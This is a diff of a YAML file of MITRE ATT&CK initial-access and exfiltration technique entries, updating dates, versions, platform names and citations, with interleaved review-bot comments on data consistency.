@@ -58552,7 +59483,6 @@ initial-access:
url: https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1133
atomic_tests: []
T1195.001:
@@ -58602,11 +59532,10 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1566.002:
technique:
- modified: '2024-04-15T23:51:25.037Z'
+ modified: '2024-10-15T16:06:32.591Z'
name: 'Phishing: Spearphishing Link'
description: |-
Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.
@@ -58645,10 +59574,10 @@ initial-access:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '2.6'
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Application Log: Application Log Content'
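Review bot: The `Office 365` and `Google Workspace` platform entries are replaced by `Identity Provider` and `Office Suite`, and this substitution recurs across the patch. Any derived artifact that is keyed on the old platform names (per-platform index files, filters, dashboards) will no longer match these techniques; confirm those artifacts are regenerated or retired in the same change so the platform views stay consistent.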
@@ -58665,7 +59594,7 @@ initial-access:
- source_name: ACSC Email Spoofing
description: Australian Cyber Security Centre. (2012, December). Mitigating
Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
- source_name: CISA IDN ST05-016
description: 'CISA. (2019, September 27). Security Tip (ST05-016): Understanding
Internationalized Domain Names. Retrieved October 20, 2020.'
@@ -58704,12 +59633,11 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1566.002
atomic_tests: []
T1566.001:
technique:
- modified: '2024-01-31T14:09:27.066Z'
+ modified: '2024-10-15T16:42:01.552Z'
name: 'Phishing: Spearphishing Attachment'
description: "Adversaries may send spearphishing emails with a malicious attachment
in an attempt to gain access to victim systems. Spearphishing attachment is
@@ -58771,7 +59699,7 @@ initial-access:
- source_name: ACSC Email Spoofing
description: Australian Cyber Security Centre. (2012, December). Mitigating
Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
- source_name: Unit 42 DarkHydrus July 2018
description: Falcone, R., et al. (2018, July 27). New Threat Actor Group DarkHydrus
Targets Middle East Government. Retrieved August 2, 2018.
@@ -58788,7 +59716,6 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1566.001
atomic_tests: []
T1195.003:
@@ -58818,7 +59745,7 @@ initial-access:
the adversary a high degree of control over the system. Hardware backdoors
may be inserted into various devices, such as servers, workstations, network
infrastructure, or peripherals.
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-04-28T16:05:10.755Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Compromise Hardware Supply Chain
x_mitre_detection: Perform physical inspection of hardware to look for potential
@@ -58832,7 +59759,6 @@ initial-access:
- 'Sensor Health: Host Status'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1091:
technique:
@@ -58895,12 +59821,11 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1091
atomic_tests: []
T1195:
technique:
- modified: '2024-02-26T14:23:37.009Z'
+ modified: '2024-10-04T11:17:00.778Z'
name: Supply Chain Compromise
description: "Adversaries may manipulate products or product delivery mechanisms
prior to receipt by a final consumer for the purpose of data or system compromise.\n\nSupply
@@ -58975,7 +59900,7 @@ initial-access:
description: Schneider Electric. (2018, August 24). Security Notification
– USB Removable Media Provided With Conext Combox and Conext Battery Monitor.
Retrieved May 28, 2019.
- url: https://www.se.com/ww/en/download/document/SESN-2018-236-01/
+ url: https://www.se.com/us/en/download/document/SESN-2018-236-01/
- source_name: Trendmicro NPM Compromise
description: Trendmicro. (2018, November 29). Hacker Infects Node.js Package
to Steal from Bitcoin Wallets. Retrieved April 10, 2019.
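Review bot: The Schneider Electric source URL changes its locale segment from `/ww/en/` to `/us/en/`. Check that the US locale path serves the same SESN-2018-236-01 notification rather than a regional landing page; if the original link is dead, a pinned web.archive.org snapshot (as used elsewhere in this patch for the ACSC source) is the more durable fix.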
@@ -58989,19 +59914,18 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1195
atomic_tests: []
T1190:
technique:
- modified: '2023-11-28T21:27:35.373Z'
+ modified: '2024-09-24T14:33:53.433Z'
name: Exploit Public-Facing Application
description: |-
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.
- Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).
+ Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet-accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).
- If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.
+ If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs (e.g., via the [Cloud Instance Metadata API](https://attack.mitre.org/techniques/T1552/005)), exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.
Adversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)
@@ -59027,7 +59951,7 @@ initial-access:
- Linux
- macOS
- Containers
- x_mitre_version: '2.5'
+ x_mitre_version: '2.6'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Application Log: Application Log Content'
@@ -59082,7 +60006,6 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1659:
technique:
@@ -59145,11 +60068,10 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.001:
technique:
- modified: '2024-03-07T14:27:04.770Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Default Accounts'
description: |-
Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -59164,6 +60086,7 @@ initial-access:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: Monitor whether default accounts have been activated or logged
into. These audits should also include checks on any appliances and applications
@@ -59172,18 +60095,18 @@ initial-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
@@ -59215,14 +60138,11 @@ initial-access:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.001
atomic_tests: []
T1199:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-15T16:08:39.968Z'
name: Trusted Relationship
description: |-
Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship abuses an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.
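Review bot: The removal of `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` here is only a move, since the same keys are added earlier in the T1078.001 object in the preceding hunks; the diff shows key reordering rather than a content change. Consider emitting keys in a stable order from the generator so that future updates show only the real deltas (here the `modified` bump for T1199).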
@@ -59233,6 +60153,11 @@ initial-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_contributors:
+ - Praetorian
+ - ExtraHop
+ - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+ x_mitre_deprecated: false
x_mitre_detection: Establish monitoring for activity conducted by second and
third party providers and other trusted entities that may be leveraged as
a means to gain access to the network. Depending on the type of relationship,
@@ -59241,22 +60166,18 @@ initial-access:
is based on IT services. Adversaries may be able to act quickly towards an
objective, so proper monitoring for behavior related to Credential Access,
Lateral Movement, and Collection will be important to detect the intrusion.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- SaaS
- IaaS
- Linux
- macOS
- - Office 365
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '2.3'
- x_mitre_contributors:
- - Praetorian
- - ExtraHop
- - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '2.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Logon Session: Logon Session Metadata'
@@ -59281,36 +60202,19 @@ initial-access:
url: https://support.microsoft.com/en-us/topic/partners-offer-delegated-administration-26530dc0-ebba-415b-86b1-b55bc06b073e?ui=en-us&rs=en-us&ad=us
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1566:
technique:
- modified: '2024-03-01T16:56:32.245Z'
+ modified: '2024-10-07T15:00:19.668Z'
name: Phishing
- description: "Adversaries may send phishing messages to gain access to victim
- systems. All forms of phishing are electronically delivered social engineering.
- Phishing can be targeted, known as spearphishing. In spearphishing, a specific
- individual, company, or industry will be targeted by the adversary. More generally,
- adversaries can conduct non-targeted phishing, such as in mass malware spam
- campaigns.\n\nAdversaries may send victims emails containing malicious attachments
- or links, typically to execute malicious code on victim systems. Phishing
- may also be conducted via third-party services, like social media platforms.
- Phishing may also involve social engineering techniques, such as posing as
- a trusted source, as well as evasive techniques such as removing or manipulating
- emails or metadata/headers from compromised accounts being abused to send
- messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation:
- Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014)
- Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof)
- the identity of the sender which can be used to fool both the human recipient
- as well as automated security tools.(Citation: cyberproof-double-bounce) \n\nVictims
- may also receive phishing messages that instruct them to call a phone number
- where they are directed to visit a malicious URL, download malware,(Citation:
- sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software)
- or install adversary-accessible remote management tools onto their computer
- (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation:
- Unit42 Luna Moth)"
+ description: |-
+ Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.
+
+ Adversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source, as well as evasive techniques such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014) Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof) the identity of the sender which can be used to fool both the human recipient as well as automated security tools,(Citation: cyberproof-double-bounce) or by including the intended target as a party to an existing email thread that includes malicious files or links (i.e., "thread hijacking").(Citation: phishing-krebs)
+
+ Victims may also receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,(Citation: sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software) or install adversary-accessible remote management tools onto their computer (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: Unit42 Luna Moth)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: initial-access
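Review bot: The `description` scalar switches from a double-quoted, line-wrapped string to a `|-` literal block, which rewrites the whole paragraph in the diff. The only substantive change is the new clause about including the target in an existing thread, cited as `(Citation: phishing-krebs)`; make sure the matching `phishing-krebs` entry exists in this object's `external_references`, otherwise the citation will be unresolved.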
@@ -59339,9 +60243,9 @@ initial-access:
- macOS
- Windows
- SaaS
- - Office 365
- - Google Workspace
- x_mitre_version: '2.5'
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '2.6'
x_mitre_data_sources:
- 'File: File Creation'
- 'Network Traffic: Network Traffic Flow'
@@ -59359,7 +60263,11 @@ initial-access:
- source_name: ACSC Email Spoofing
description: Australian Cyber Security Centre. (2012, December). Mitigating
Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ - source_name: phishing-krebs
+ description: 'Brian Krebs. (2024, March 28). Thread Hijacking: Phishes That
+ Prey on Your Curiosity. Retrieved September 27, 2024.'
+ url: https://krebsonsecurity.com/2024/03/thread-hijacking-phishes-that-prey-on-your-curiosity/
- source_name: CISA Remote Monitoring and Management Software
description: CISA. (n.d.). Protecting Against Malicious Use of Remote Monitoring
and Management Software. Retrieved February 2, 2023.
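Review bot: The added `phishing-krebs` source resolves the `(Citation: phishing-krebs)` reference introduced in the T1566 description above, so the object stays internally consistent. The ACSC URL is pinned to a web.archive.org snapshot here as in the other two phishing sub-techniques; the same snapshot timestamp is used in each, which is the right way to keep the three copies in sync.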
@@ -59397,11 +60305,10 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:09:46.024Z'
name: Valid Accounts
description: |-
Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -59418,7 +60325,6 @@ initial-access:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- x_mitre_attack_spec_version: 3.1.0
x_mitre_contributors:
- Syed Ummar Farooqh, McAfee
- Prasad Somasamudram, McAfee
@@ -59428,7 +60334,7 @@ initial-access:
- Netskope
- Mark Wee
- Praetorian
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -59437,19 +60343,17 @@ initial-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
@@ -59497,11 +60401,12 @@ initial-access:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1566.004:
technique:
- modified: '2023-10-15T11:49:40.990Z'
+ modified: '2024-10-15T16:06:47.134Z'
name: Spearphishing Voice
description: |-
Adversaries may use voice communications to ultimately gain access to victim systems. Spearphishing voice is a specific variant of spearphishing. It is different from other forms of spearphishing in that is employs the use of manipulating a user into providing access to systems through a phone call or other forms of voice communications. Spearphishing frequently involves social engineering techniques, such as posing as a trusted source (ex: [Impersonation](https://attack.mitre.org/techniques/T1656)) and/or creating a sense of urgency or alarm for the recipient.
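Review bot: For T1078 the `x_mitre_attack_spec_version` field is removed as `3.1.0` in an earlier hunk and re-added as `3.2.0` here, so the real change is a version bump that the key reordering splits across two hunks. A stable key order in the generator would make this a one-line change and easier to review.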
@@ -59521,10 +60426,8 @@ initial-access:
- Linux
- macOS
- Windows
- - Office 365
- - SaaS
- - Google Workspace
- x_mitre_version: '1.0'
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
type: attack-pattern
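Review bot: Unlike the other platform hunks in this patch, T1566.004 drops `SaaS` entirely and keeps only `Identity Provider`; the sibling phishing techniques keep `SaaS` alongside the new entries. Verify this matches the upstream technique definition rather than being a merge artifact, since it narrows the platforms on which the technique is indexed.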
@@ -59557,7 +60460,6 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1195.002:
technique:
@@ -59596,7 +60498,7 @@ initial-access:
may be specific to a desired victim set or may be distributed to a broad set
of consumers but only move on to additional tactics on specific victims.(Citation:
Avast CCleaner3 2018)(Citation: Command Five SK 2011) "
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-04-28T16:04:36.636Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Compromise Software Supply Chain
x_mitre_detection: 'Use verification of distributed binaries through hash checking
@@ -59611,7 +60513,6 @@ initial-access:
- 'File: File Metadata'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.002:
technique:
@@ -59691,11 +60592,10 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1200:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:40.332Z'
name: Hardware Additions
description: |-
Adversaries may introduce computer accessories, networking hardware, or other computing devices into a system or network that can be used as a vector to gain access. Rather than just connecting and distributing payloads via removable storage (i.e. [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091)), more robust hardware additions can be used to introduce new functionalities and/or features into a system that can then be abused.
@@ -59751,11 +60651,10 @@ initial-access:
url: https://www.youtube.com/watch?v=fXthwl6ShOg
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1189:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:55:47.494Z'
name: Drive-by Compromise
description: "Adversaries may gain access to a system through a user visiting
a website over the normal course of browsing. With this technique, the user's
@@ -59816,8 +60715,8 @@ initial-access:
- Windows
- Linux
- macOS
- - SaaS
- x_mitre_version: '1.5'
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Network Traffic: Network Traffic Content'
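Review bot: T1189 replaces `SaaS` with `Identity Provider` rather than adding to it, so the technique is no longer indexed under SaaS. That is a semantic change, not just a rename; confirm it reflects the upstream data before merging.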
@@ -59845,13 +60744,12 @@ initial-access:
url: https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.004:
technique:
- modified: '2024-03-29T15:42:13.499Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Cloud Accounts'
description: "Valid accounts in cloud environments may allow adversaries to
perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -59891,8 +60789,10 @@ initial-access:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jon Sternstein, Stern Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
or malicious behavior, such as accessing information outside of the normal
@@ -59900,13 +60800,13 @@ initial-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.7'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.8'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Logon Session: Logon Session Metadata'
@@ -59937,14 +60837,11 @@ initial-access:
url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.004
atomic_tests: []
T1566.003:
technique:
- modified: '2024-01-31T14:15:55.690Z'
+ modified: '2024-10-15T15:16:30.272Z'
name: Spearphishing via Service
description: "Adversaries may send spearphishing messages via third-party services
in an attempt to gain access to victim systems. Spearphishing via service
@@ -60011,11 +60908,10 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.003:
technique:
- modified: '2023-07-14T13:04:04.591Z'
+ modified: '2024-10-15T16:36:36.681Z'
name: 'Valid Accounts: Local Accounts'
description: "Adversaries may obtain and abuse credentials of a local account
as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -60067,15 +60963,14 @@ initial-access:
external_id: T1078.003
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.003
atomic_tests: []
exfiltration:
T1567:
technique:
- modified: '2023-09-05T15:00:36.471Z'
+ modified: '2024-10-15T15:57:40.951Z'
name: Exfiltration Over Web Service
description: |-
Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to compromise. Firewall rules may also already exist to permit traffic to these services.
@@ -60099,10 +60994,9 @@ exfiltration:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
@@ -60121,13 +61015,12 @@ exfiltration:
external_id: T1567
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1567.004:
technique:
- modified: '2023-10-12T05:22:59.079Z'
+ modified: '2024-10-15T15:57:55.928Z'
name: Exfiltration Over Webhook
description: "Adversaries may exfiltrate data to a webhook endpoint rather than
over their primary command and control channel. Webhooks are simple mechanisms
@@ -60166,9 +61059,8 @@ exfiltration:
- macOS
- Linux
- SaaS
- - Office 365
- - Google Workspace
- x_mitre_version: '1.0'
+ - Office Suite
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Command: Command Execution'
@@ -60218,7 +61110,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1029:
technique:
@@ -60238,7 +61129,7 @@ exfiltration:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1029
external_id: T1029
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-28T00:26:48.769Z'
name: Scheduled Transfer
description: |-
Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain intervals. This could be done to blend traffic patterns with normal activity or availability.
